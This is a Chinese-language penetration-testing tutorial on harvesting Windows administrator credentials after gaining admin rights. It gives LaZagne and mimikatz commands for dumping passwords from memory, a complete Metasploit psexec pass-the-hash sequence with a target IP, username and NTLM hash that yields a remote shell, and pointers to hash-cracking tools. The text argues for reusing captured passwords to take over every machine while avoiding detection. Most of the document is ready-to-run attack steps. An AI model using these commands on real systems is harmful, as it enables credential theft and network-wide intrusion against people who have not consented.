提权后期密码安全性测试
虽然我们已经有了管理员权限,但是我们最好是有管理员密码进行扩展攻击,很多管理员账号密码都设置成一样的,攻下一台就可以拿下所有,同时远程连接时,比如使用木马,很容易被发现或者清理,如果用管理员账号,可以清除渗透,也就是对操作系统和服务器不产生影响的情况下,尤其是正规渗透测试过程中,都是取得管理员账号密码,登录3389端口或反端口连接者证明为成功
简单地说就是从 获取管理员权限——>获取管理员账号
一、本地管理员密码提取
本地管理员密码如何直接提取
工具
lazagne
lazagne.exe/?>>1.txt
mimikatz(巴西烤肉)
第一条:
privilege::debug
//提升权限
第二条:
sekurlsa::logonpa
ssWords //抓取密码
二、本地Hash远程直接登录
遇到高版本的系统,密码不是明文的情况下,我们通过哈希值来取得管理员账号
主要通过MSF提供的exploit/windows/smb/psexec模块来完成。
msf >use exploit/windows/smb/psexec
msf >set RHOST 192.168.1.109
msf >set SMBUser administrator(管理员账号名称)
msf >set SMBPass 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4(哈希值 从500: 开始 到::: 结束)
msf >exploit
msf >shell
show targets
查看攻击目标
show options
查看配置选项
三、hash密钥暴力破解
一、通过LC5暴力破解Hash密码
使用gmer直接提权SAM和system文件或用Pwdump7提取hash,最后使用LC5破解。
二、使用Ophcrack破解系统Hash密码
http://simeon.blog.51cto.com/18680/122160
三、在线破解